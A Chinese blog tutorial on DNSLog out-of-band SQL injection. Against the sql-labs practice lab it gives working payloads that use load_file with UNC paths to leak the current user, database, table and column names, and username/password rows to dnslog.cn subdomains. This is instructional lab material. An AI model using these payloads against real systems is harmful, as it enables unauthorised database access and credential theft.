SQL注入之DNSLog外带注入

已于 2024-02-27 01:04:37 修改
阅读量2.5k 收藏 42
点赞数 25
分类专栏: 网络安全 文章标签: sql spring 数据库 网络安全 mysql
于 2024-02-21 21:59:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64620936/article/details/136216984
版权
本文介绍了DNSLog的概念,以及如何利用它进行数据库注入攻击。涉及环境设置(如MySQL的secure_file_priv配置),实际操作步骤(如使用Ceye.ioDNSLog.cn获取域名并进行布尔盲注攻击),以及数据提取的方法。
摘要由CSDN通过智能技术生成

一、认识:

什么是dnslog呢?

DNS就是域名解析服务,把一个域名转换成对应的IP地址,转换完成之后,DNS服务器就会有一个日志记录本次转换的时间、域名、域名对应的ip、请求方的一些信息,这个日志就叫DNSLog。

但是想要查看DNSLog信息的人,必须是拥有DNS服务器权限的人,这就使的我们要是用dnslog注入方法的话,就需要搭建自己的一个dns服务器,成本相对较高。

所以在此就推荐两个平台,可以快速让我们使用dnslog外带注入

  1. ceye.io
  2. dnslog.cn

也可以使用BurpSuite同样可以实现相应功能。

二、利用场景

使用dnslog方法的场景非常苛刻

需要知道以下数据

  1. secure_file_priv=""  ,secure_file_priv必须是空

    1. secure_file_priv为null,load_file则不能加载文件。

    2. secure_file_priv为路径,可以读取路径中的文件;

    3. secure_file_priv为空,可以读取磁盘的目录;

  2. 服务器只能在windows下使用,因为需要使用到UNC路径

  3. 拥有root权限,因为有root权限后才能使用load_file()这个函数

    1. LOAD_FILE()函数可以加载本地文件系统中的文件,并将其作为字符串返回

三、环境的搭建

还是使用我们的sql-labs进行实验

首先查看mysql中secure_file_priv是否为空,如若不为空,则进入my.ini文件进行修改

进到my.ini文件中将secure_file_priv的值从null改为""
如果没有的话可以直接写入secure_file_priv=""之后重新启动mysql

1、查看secure_file_priv是否为空 

show variables like '%secu%';

2、进入my.ini修改

在my.ini中添加secure_file_priv=""

重启mysql

四、实现

此处我使用dnslog.cn获取一盒域名

1、先进行测试

以sql-labs的第8关的布尔盲注为例:

解释:我们先进测试,请求一下当前登录的用户;

1、load_file()函数用于从文件系统中读取文件内容并将其作为字符串返回,

注:四个\是因为斜杠有特殊含义,我们需要转义两个,user()是我们要请求的数据,最后一个是我们刚才获取的域名

2、然后使用concat()函数将数据拼接起来

3、相当于请求了一个UNC的地址就是这样一个数据\\user().ui9a1m.dnslog.cn这个主机下的/abc这个共享文件夹虽然不存在但是无所谓我们的目的是需要将user()数据获取,它会将数据解析到我们使用的dnslog.cn中它可以记录解析后的数据
4、这里为什么要用hex()呢因为user()中有一个@符它不支持所以我们将它转为16进制

?id=1' and load_file(concat('\\\\',hex(user()),'.ui9a1m.dnslog.cn/abc'))--+

发送请求,查看我们得到的信息

对16进制进行还原,可以看到得到了我们想要的数据

进行爆库

此处就不需要转16进制,直接请求表名

?id=1' and load_file(concat('\\\\',database(),'.ui9a1m.dnslog.cn/abc'))--+

得到库名:security

接下来我们进行爆表名

爆表名

注:因为使用group_concat()函数拼接时默认使用' , '进行拼接,dnslog无法解析,所以这里有两种方法可以解决

1、要么转为16进制,

2、要么使用separator "_"  使用下划线连接

?id=1'  and load_file(concat('\\\\',(select group_concat(table_name separator '_') from information_schema.tables where table_schema=database()),'.503l34.dnslog.cn/abc'))--+

很明显,我们要得到数据大概率在users表里,可以继续进行查询测试

爆字段

id=1' 20and load_file(concat('\\\\',(select group_concat(column_name separator '_') from information_schema.columns where table_schema=database() and table_name='users'),'.5qir98.dnslog.cn/abc'))--+

很明显,我们查对了,得到了想要的列名:username、password

那么知道了库名,表名,列名,接下来就可以查数据了

爆数据

id=1' and load_file(concat('\\\\' (select concat(username,'_',password) from security.users limit 0,1),'.nr4rzc.dnslog.cn/abc'))--+

注:在此处dnslog不能解析连接符'~',这里的我解决办法有两个;

1、对concat()函数进行16进制转换

id=1' and load_file(concat('\\\\' (select hex(concat(username,'_',password)) from security.users limit 0,1),'.nr4rzc.dnslog.cn/abc'))--+

2、或者将连接符换成'_'

在这里我两个都用了下是可以,上面仅展示一个

气泡水。
关注
  • 25
    点赞
  • 42
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
dnslog:简约的 DNS 日志记录工具
05-31
dns日志 信息 简约的 DNS 日志记录工具。 捕获所有 DNS 流量并将其文本表示(以压缩形式)存储到/var/log/dnslog/<date>.log.gz 。 创建用于网络取证目的。 $ zcat /var/log/dnslog/2018-07-12.log.gz | head 00:00:00.001595 R A 192.168.107.168 192.168.110.233 ocsp.verisign.com 23.37.43.27 00:00:00.001949 Q PTR 192.168.107.146 199.253.182.182 2.6.e.f.a.b.e.f.f.f.6.5.0.5.2.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa ? 00:00:00.002314 R AAAA 37.48.122.173 194.5
DNSLog漏洞探测(二)之常用DNSLog平台
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-10 3735
我们在上一篇文章中我们介绍了什么是DNSLog,如果我们自己要去搭建一个DNSLog的服务平台,还是比较复杂和麻烦的,所以我们可以直接去使用一些公开免费的DNSLog平台,DNSLog的平台非常的多,但是实际上大部分的DNSLog的平台都是昙花一现,真正意义上稳定持久的就只有那么几个,那么我们接下来给大家介绍几个常用且稳定的DNSLog平台吧。
DNSlog注入(利用DNSlog平台将SQL盲注变成回显注入
柠檬i的博客
08-07 1218
DNSlog注入是一种利用DNS服务器记录域名解析请求的特性,来获取SQL注入结果的技术。它的原理是通过构造一个包含数据库信息的子域名,然后使用MySQL的load_file函数或其他方法,让目标服务器向DNS服务器发起解析请求,从而在DNS服务器上留下注入结果的痕迹。
dnslog外带是什么
最新发布
来而不往非礼也
05-14 1028
在看hw面经的时候发现了dnslog外带的相关的知识点,有点迷惑,所以写下这篇文章记录,方便日后查阅。
DNSlog注入 信息的 带外|外带 sql注入利用详解+实操
weixin_48083470的博客
08-04 3578
DNSlog注入 DNSlog注入原理 dnslog注入也可以称之为dns带外查询,是一种注入姿势,可以通过查询相应的dns解析记录,来获取我们想要的数据 一般情况下,在我们无法通过联合查询直接获取数据的情况下,我们只能通过盲注,来一步步的获取数据,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度 首先说明,dns带外查询属于MySQL注入,在MySQL中有个系统属性 s
DNSlog介绍
热门推荐
告白的博客
07-09 2万+
0x00 DNSlog 介绍 首先我们知道DNS是起ip与域名的解析的服务,通过ip可以解析到对应的域名。DNSlog就是储存在DNS上的域名相关的信息,它记录着你对域名或者IP的访问信息,也就是类似于日志文件, 0x01 DNSlog回显原理 首先了解一下多级域名的概念,我们知道因特网采用树状结构命名方法,按组织结构划分域是一个名字空间中一个被管理的划分,域可划分为子域,子域再可被划分为多级域名称为一级域名,二级域名,三级域名,从一个域名地址来从右到左依次是顶级域名,二级域名,三级域名,例如 gao
好用的dnslog在线平台
siu~
08-21 1万+
dnslog在线平台分享
DNSLog漏洞探测(一)之DNSLog介绍
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-08 4895
DNSLog是一种基于DNS协议的信息收集技术,它可以用于网络安全领域的渗透测试、漏洞挖掘等方面。DNSLog的原理是利用DNS协议的特性,将需要收集的信息编码成DNS查询请求,然后将请求发送到DNS服务器,最后通过DNS服务器的响应来获取信息。DNSLog的实现方式有很多种,其中最常见的是使用第三方DNS服务。DNSLog的优点是隐蔽性高,缺点是响应时间较慢和存在一定的误报率。
DNSlog外带原理及注入分析
Sentiment的博客
04-27 1万+
前言 最近一直听到DNSlog外带原理等词但对其原理一直只是自己的理解(回显DNS请求后的日志)并没有真正的了解过,所以这里做一下记录。 DNSlog原理 DNS DNS(Domain Name System)就是域名系统,负责把域名转换成IP地址;例如向浏览器访问a.com,浏览器就会将其解析成真实的IP访问对应服务器上的服务。 DNSlog DNSlog就是DNS的日志,DNS在域名解析的时候会留下域名和解析IP的记录 DNSlog外带原理 DNS在解析的时候会留下日志,我们将信息放在高级域名中,传递到
Web安全之SQL注入攻击
03-04
①这个晨讲我构思了两个星期,但是之前电脑坏了,一直拖...今天由我给大家带来《web安全之SQL注入篇》系列晨讲,首先对课程进行简单介绍,SQL注入篇一共分为三讲:第一讲:“纸上谈兵:我们需要在本地架设注入环境,构
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
DNSlog外带
adaosanqian的博客
02-28 7401
减轻盲注的复杂操作,运用DNSlog外带来进行操作
渗透测试---手把手教你SQL注入(4)--DNSLOG外带注入
weixin_52796034的博客
10-10 750
通常我们面对SQL注入过程中没有回显的情况时,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,需要花费大量时间进行测试,并且还可能需要对目标服务器发送大量请求,这会导致我们的IP容易被目标服务器封掉.
SQL注入DnsLog注入
qq_52310755的博客
03-22 1950
远程访问UNC路径中主机的地址,如果是域名将会进行解析并留下记录,通过查看DNS解析记录(DNS日志)来达到有回显的目的。DnsLog注入就是利用load_file()函数访问远程文件的特点,对延时盲注等无回显的注入或其他无回显的攻击带来回显。正常来讲每个查询记录都会在相应DNS服务器上留下相关的查询日志,一般来说企业或者自己部署的DNS在上图标红位置处,Ps:如果paylaod没有问题但一直刷新不出来可能是谷歌浏览器的问题,换个浏览器访问一下就可以了。,下面以盲注为例,需要有盲注的基础。
dnslog使用方法
qq_36232967的博客
06-20 1560
在实际使用中,DNSLog 可以用于获取恶意软件的 C&C 服务器、验证域名接入情况、检测恶意软件的行为等。请注意,使用 DNSLog 应该遵循合法和道德的原则,确保仅在合法且授权的环境中使用。此外,具体的 DNSLog 使用方法可能会根据所选择的平台而有所不同,你应该参考平台提供的文档和指南以获得更详细的操作说明。设置 DNS 配置:将你要测试的系统或应用程序的 DNS 配置中的某个域名或主机名设置为你创建的域名,例如将。创建域名:在注册的平台上,你可以创建一个自定义的域名,例如。
DNSLog原理及代码实现
0of_blog
08-04 4715
自实现DNSLog服务器的意义及作用: 一些公共DNSLog服务可能已进入防火墙黑名单。不依赖他人服务器,增加可靠性。 结合自己的漏洞扫描工具,更定制化修改和部署DNSLog API。达到更高的效率。 附加实现DNS重绑定攻击等其他功能 熟悉DNSLog底层技术原理......
DNSlog
遇事不决冲冲冲
08-08 9275
什么是DNSlog DNSlog就是存储在DNS Server上的域名信息,它记录着用户对域名的访问信息,类似日志文件。 原理 payload放到目标网址(也就是dnslog的域名)的子域名处,让存在漏洞的地方去解析,由于解析了域名,发起DNS请求,DNS在解析的时候会留下日志,这些日志会反弹到dnslog的平台上,通过读取这些解析的日志,来获取信息。 使用方法 通过Burp Suite 通过在线平台 http://www.dnslog.cn/ http://ceye.io/ 利用场景 执行命令时没
DNSlog平台详解
不忘初心,护天下安全!
09-21 4158
DNSLOG 是解析日志, DNS分为三级域名, 域名不区分大小写, 所以利用解析的日志把攻击者需要的值带出, 称为数据外带,原理上只要能进行DNS请求的函数都可能存在DNSlog注入,如命令执行、SSRF、XXE、sql盲注、xxs盲打等。在windows和linux因具体shell指令不同,因此需要分情况讨论,但思路一致,通过在dnslog平台的查询中,插入主机指令执行后的结果,将结果数据外带。以靶场 pikachu 的时间盲注为例,输入qianli' and sleep(5)#,耗时5秒。
DNSlog外带数据注入
C_LCH_2000的博客
08-04 1418
盲注代替 DNS log即DNS日志,域名解析的记录。
sql注入外带dnslog
09-11
很抱歉,我不能提供关于SQL注入外带DNS log的任何信息。 SQL注入是一种安全漏洞,允许攻击者通过在应用程序中插入恶意SQL代码来获取未经授权的访问权限或者对数据库进行操纵。这是一种严重的漏洞,应该被尽快修复。如果你担心你的应用程序存在SQL注入漏洞,请立即与相关安全团队或专业人员联系以修复该问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值